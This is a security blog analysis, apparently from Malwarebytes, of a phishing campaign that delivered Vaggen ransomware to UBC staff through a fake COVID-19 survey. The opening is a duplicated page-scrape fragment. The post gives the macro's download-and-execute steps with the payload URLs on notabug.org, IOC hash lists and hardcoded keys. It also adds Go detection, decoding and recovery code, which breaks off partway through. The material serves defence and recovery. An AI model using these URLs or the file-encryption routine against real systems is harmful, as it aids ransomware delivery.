of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2359 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2360 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2361 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2362 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2363 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2364 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2365 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2366 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2367 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2368 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2369 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2370 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2371 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2372 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2373 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2374 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2375 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we've observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort the victims who want their encrypted files back.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful, thanks to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly by email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters, which would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much harder to flag spam arriving through file sharing services without creating a number of false positives: the notification email comes from the sharing platform itself, which has a good reputation, and the malicious file is only fetched after the recipient follows the link.

The attacker claimed to be a manager and added the following comment to the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. The delivered .docx therefore contains no VBA of its own: the link to the template is an external relationship inside the document package, which Word follows when the file is opened, so a scanner that only looks for macros in the attachment sees nothing suspicious.
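The remote-template link can be found without opening the file in Word: it is a relationship entry in one of the package's .rels parts. The following Go program is an added example written for this page (not code from the post, from UBC or from any vendor). It unzips a .docx in memory and lists every attachedTemplate relationship whose TargetMode is External. The document it checks is a minimal package constructed inline, and the template URL in it is a placeholder, since the post names notabug.org as the host but not the template's full path.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// relationships is the subset of an OOXML .rels part that we need.
type relationships struct {
	Rels []struct {
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// RemoteTemplates returns every external attachedTemplate target in a .docx:
// the relationship Word follows, before any macro runs, to fetch a remote .dotm.
// A clean document returns an empty list; an unreadable package returns an error.
func RemoteTemplates(doc []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(doc), int64(len(doc)))
	if err != nil {
		return nil, err
	}
	var hits []string
	for _, f := range zr.File {
		// Word keeps the template link in word/_rels/settings.xml.rels; scanning
		// every .rels part also catches a link that was moved to another part.
		if !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		var rels relationships
		err = xml.NewDecoder(rc).Decode(&rels)
		rc.Close()
		if err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			if strings.HasSuffix(r.Type, "/attachedTemplate") && r.TargetMode == "External" {
				hits = append(hits, r.Target)
			}
		}
	}
	return hits, nil
}

// buildDocx assembles a minimal package in memory (a constructed stand-in, not
// the UBC document). With templateURL empty, the settings part has no template link.
func buildDocx(templateURL string) []byte {
	const ns = "http://schemas.openxmlformats.org/"
	rels := `<Relationships xmlns="` + ns + `package/2006/relationships">`
	if templateURL != "" {
		rels += `<Relationship Id="rId1" Type="` + ns + `officeDocument/2006/relationships/attachedTemplate" Target="` + templateURL + `" TargetMode="External"/>`
	}
	rels += `</Relationships>`
	parts := map[string]string{
		"[Content_Types].xml":          `<Types xmlns="` + ns + `package/2006/content-types"/>`,
		"word/document.xml":            `<w:document xmlns:w="` + ns + `wordprocessingml/2006/main"/>`,
		"word/settings.xml":            `<w:settings xmlns:w="` + ns + `wordprocessingml/2006/main"/>`,
		"word/_rels/settings.xml.rels": rels,
	}
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, body := range parts {
		w, _ := zw.Create(name)
		io.WriteString(w, body)
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	// Placeholder URL: the post names notabug.org as the host but not the template's path.
	doc := buildDocx("https://example.invalid/raw/master/template.dotm")
	fmt.Println(RemoteTemplates(doc))
	fmt.Println(RemoteTemplates(buildDocx("")))
}
```

To check a real file, read it with os.ReadFile and pass the bytes to RemoteTemplates. A hit is not proof of malice on its own, since organizations do use network templates, but an external target on a public code host or an unfamiliar domain in a document that arrived from outside is exactly the pattern seen here.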
The template itself was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

1. Gets the %APPDATA% directory.
2. Creates the Byxor directory in %APPDATA%.
3. Downloads a file from the following URL and writes it as Polisen.exe:
   notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
4. Downloads a file from the following URL and writes it as Killar.exe:
   notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
5. Calls the Shell function to execute killar.exe.
6. Checks the return value of Shell to see whether the launch succeeded (the return value is the task ID of the started application).
7. If it succeeded, sends a GET request to:
   canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
8. If it did not, sends a GET request to:
   canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted when a particular event occurs, which makes it a useful early warning that an intruder has reached a planted file or link inside a network.
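For detection, the steps above translate into a short chain of host and network events: an Office process downloading raw files from a code host, an executable starting from %APPDATA% with Word as its parent, an Office process calling canarytokens.com, and later a burst of renames to .VAGGEN. The following Go program is an added example (not from the post, and not any vendor's rule syntax) that applies those four rules to a constructed log in a flat key=value format; the process IDs and file paths in the sample are made up, and only the URLs are the ones reported above.

```go
package main

import (
	"fmt"
	"strings"
)

// Event is one flat key=value record (a constructed export format for this demo,
// not a real EDR schema); values contain no spaces.
type Event map[string]string

func parseEvent(line string) Event {
	ev := Event{}
	for _, field := range strings.Fields(line) {
		if kv := strings.SplitN(field, "=", 2); len(kv) == 2 {
			ev[kv[0]] = kv[1]
		}
	}
	return ev
}

var officeHosts = map[string]bool{"winword.exe": true, "excel.exe": true, "powerpnt.exe": true}

func base(p string) string {
	p = strings.ToLower(p)
	if i := strings.LastIndexAny(p, `\/`); i >= 0 {
		return p[i+1:]
	}
	return p
}

type Alert struct{ Rule, Detail string }

const vaggenThreshold = 5 // renames per process before the ransomware rule fires

// Detect applies three behavioural rules drawn from the macro's steps plus one
// from the encryption phase:
//  1. an Office process starts an .exe from %APPDATA% (the Byxor drop folder);
//  2. an Office process fetches a raw file from a code-hosting site;
//  3. an Office process requests canarytokens.com (the success/failure ping);
//  4. one process renames vaggenThreshold files to *.VAGGEN.
func Detect(lines []string) []Alert {
	var alerts []Alert
	renames := map[string]int{} // pid -> count of .VAGGEN renames
	for _, line := range lines {
		ev := parseEvent(line)
		fromOffice := officeHosts[base(ev["image"])]
		switch ev["type"] {
		case "process":
			img := strings.ToLower(ev["image"])
			if officeHosts[base(ev["parent"])] && strings.Contains(img, `\appdata\roaming\`) && strings.HasSuffix(img, ".exe") {
				alerts = append(alerts, Alert{"office_spawns_appdata_exe", ev["image"]})
			}
		case "http":
			host := strings.ToLower(ev["host"])
			switch {
			case fromOffice && host == "canarytokens.com":
				alerts = append(alerts, Alert{"office_canarytoken_ping", host + ev["path"]})
			case fromOffice && strings.Contains(ev["path"], "/raw/"):
				alerts = append(alerts, Alert{"office_raw_download", host + ev["path"]})
			}
		case "rename":
			if strings.HasSuffix(strings.ToLower(ev["target"]), ".vaggen") {
				renames[ev["pid"]]++
				if renames[ev["pid"]] == vaggenThreshold {
					alerts = append(alerts, Alert{"mass_rename_vaggen", "pid " + ev["pid"]})
				}
			}
		}
	}
	return alerts
}

// sampleLog is constructed to mirror the chain described above; the Office path
// is shortened so that every value stays a single token.
var sampleLog = []string{
	`type=http pid=1200 image=C:\Office\WINWORD.EXE host=notabug.org path=/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe`,
	`type=http pid=1200 image=C:\Office\WINWORD.EXE host=notabug.org path=/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe`,
	`type=process pid=4242 parent=C:\Office\WINWORD.EXE image=C:\Users\alice\AppData\Roaming\Byxor\Killar.exe`,
	`type=http pid=1200 image=C:\Office\WINWORD.EXE host=canarytokens.com path=/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp`,
	`type=rename pid=4242 target=C:\Users\alice\Documents\report1.docx.VAGGEN`,
	`type=rename pid=4242 target=C:\Users\alice\Documents\report2.docx.VAGGEN`,
	`type=rename pid=4242 target=C:\Users\alice\Documents\budget.xlsx.VAGGEN`,
	`type=rename pid=4242 target=C:\Users\alice\Pictures\holiday.jpg.VAGGEN`,
	`type=rename pid=4242 target=C:\Users\alice\Desktop\notes.txt.VAGGEN`,
	`type=process pid=777 parent=C:\Windows\explorer.exe image=C:\Windows\System32\notepad.exe`,
	`type=http pid=778 image=C:\Browser\chrome.exe host=canarytokens.com path=/x/index.html`,
}

func main() {
	for _, a := range Detect(sampleLog) {
		fmt.Printf("%-28s %s\n", a.Rule, a.Detail)
	}
}
```

The last two sample lines are benign controls: a browser visiting canarytokens.com and a user process started by explorer.exe produce nothing, because each rule keys on the Office parent or image. The rename rule fires once per process when the count reaches vaggenThreshold; tune that against the rename volume your own telemetry shows for normal activity.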
Here, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user's files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD, to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted as main_main.

Other functions belonging to the main application have obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA. Three of them map to the following operations:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (such as the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Each encrypted chunk is first decoded from Base64, then decrypted with the hardcoded XXTEA key "STALKER". At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback passed to the standard Go function filepath.Walk (package path/filepath).

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here.
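Recovering the XXTEA-protected strings mentioned above is a small job once the library's wire format is known. The following Go program is an added example for this page (not the malware's code and not the xxtea-go library itself): it reimplements xxtea-go's conventions, namely little-endian 32-bit words, the plaintext length stored in the last word, and short keys such as "STALKER" zero-padded to 16 bytes, and decodes a Base64 chunk with them. The encrypted sample it decodes is constructed inside the program with the same routine; the real ransom note text is not reproduced here.

```go
package main

import (
	"encoding/base64"
	"errors"
	"fmt"
)

// words/unwords use the little-endian 32-bit word layout of xxtea-go.
func words(b []byte) []uint32 {
	w := make([]uint32, (len(b)+3)/4)
	for i, c := range b {
		w[i>>2] |= uint32(c) << ((uint(i) & 3) << 3)
	}
	return w
}

func unwords(w []uint32) []byte {
	out := make([]byte, len(w)*4)
	for i := range out {
		out[i] = byte(w[i>>2] >> ((uint(i) & 3) << 3))
	}
	return out
}

// btea is the reference XXTEA routine applied to v in place, in either direction.
func btea(v []uint32, key []byte, encrypt bool) {
	kb := make([]byte, 16) // xxtea-go zero-pads a short key such as "STALKER"
	copy(kb, key)
	k, n := words(kb), uint32(len(v))
	mx := func(sum, y, z, p, e uint32) uint32 {
		return ((z>>5 ^ y<<2) + (y>>3 ^ z<<4)) ^ ((sum ^ y) + (k[(p&3)^e] ^ z))
	}
	const delta = 0x9e3779b9
	rounds := 6 + 52/n
	var sum, y, z uint32
	if encrypt {
		for z = v[n-1]; rounds > 0; rounds-- {
			sum += delta
			e := (sum >> 2) & 3
			for p := uint32(0); p < n-1; p++ {
				y = v[p+1]
				v[p] += mx(sum, y, z, p, e)
				z = v[p]
			}
			y = v[0]
			v[n-1] += mx(sum, y, z, n-1, e)
			z = v[n-1]
		}
		return
	}
	for sum, y = rounds*delta, v[0]; rounds > 0; rounds-- {
		e := (sum >> 2) & 3
		for p := n - 1; p > 0; p-- {
			z = v[p-1]
			v[p] -= mx(sum, y, z, p, e)
			y = v[p]
		}
		z = v[n-1]
		v[0] -= mx(sum, y, z, 0, e)
		y = v[0]
		sum -= delta
	}
}

// DecodeString reverses Base64(XXTEA(s)). xxtea-go stores the plaintext length in
// the last word, which doubles as a sanity check: with the wrong key it is garbage.
func DecodeString(b64, key string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(ct) < 8 || len(ct)%4 != 0 {
		return "", errors.New("xxtea: ciphertext must be >= 8 bytes and a multiple of 4")
	}
	v := words(ct)
	btea(v, []byte(key), false)
	pt, m := unwords(v[:len(v)-1]), v[len(v)-1]
	if n := uint32(len(pt)); m < n-3 || m > n {
		return "", errors.New("xxtea: length word out of range (wrong key?)")
	}
	return string(pt[:m]), nil
}

// EncodeString is the forward direction, used here only to build demo input.
func EncodeString(s, key string) string {
	v := append(words([]byte(s)), uint32(len(s)))
	btea(v, []byte(key), true)
	return base64.StdEncoding.EncodeToString(unwords(v))
}

func main() {
	blob := EncodeString("Your files are encrypted. Pay 80 USD in Bitcoin.", "STALKER") // constructed
	fmt.Println(blob)
	fmt.Println(DecodeString(blob, "STALKER"))  // recovers the text
	fmt.Println(DecodeString(blob, "WRONGKEY")) // fails the length check
}
```

The length word is what makes a wrong key fail loudly rather than yield binary noise, which matters when you are trying candidate keys pulled from a strings dump. Feed DecodeString the Base64 chunks as they appear in the binary; the key is whatever constant the decryption routine is called with.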
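The file layout described in this and the following paragraph (a 12-byte nonce, the ciphertext, then the 16-byte GCM tag, which is what gcm.Seal produces when the nonce is passed as its destination buffer) is what a recovery tool has to undo. The following Go program is an added example for this page, not the ransomware's code: Decrypt reverses that layout with a given key, and RecoverTree walks a directory the way the malware's own filepath.Walk callback did, writing each *.VAGGEN file back under its original name when the tag verifies. The files it operates on are constructed in a temporary directory, and Encrypt exists only to build them.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Key reported on this page; 32 bytes, so aes.NewCipher selects AES-256.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block) // 12-byte nonce, 16-byte tag
}

// Decrypt reverses the layout the page describes: nonce | ciphertext | tag.
// gcm.Open verifies the tag first, so a wrong key or a truncated file fails closed.
func Decrypt(blob, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	ns := gcm.NonceSize()
	if len(blob) < ns+gcm.Overhead() {
		return nil, errors.New("vaggen: file shorter than nonce+tag")
	}
	return gcm.Open(nil, blob[:ns], blob[ns:], nil)
}

// Encrypt reproduces the output format (gcm.Seal with the nonce as dst) so the
// demo has something to recover; the sample drew its nonce from CryptGenRandom.
func Encrypt(plain, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plain, nil), nil
}

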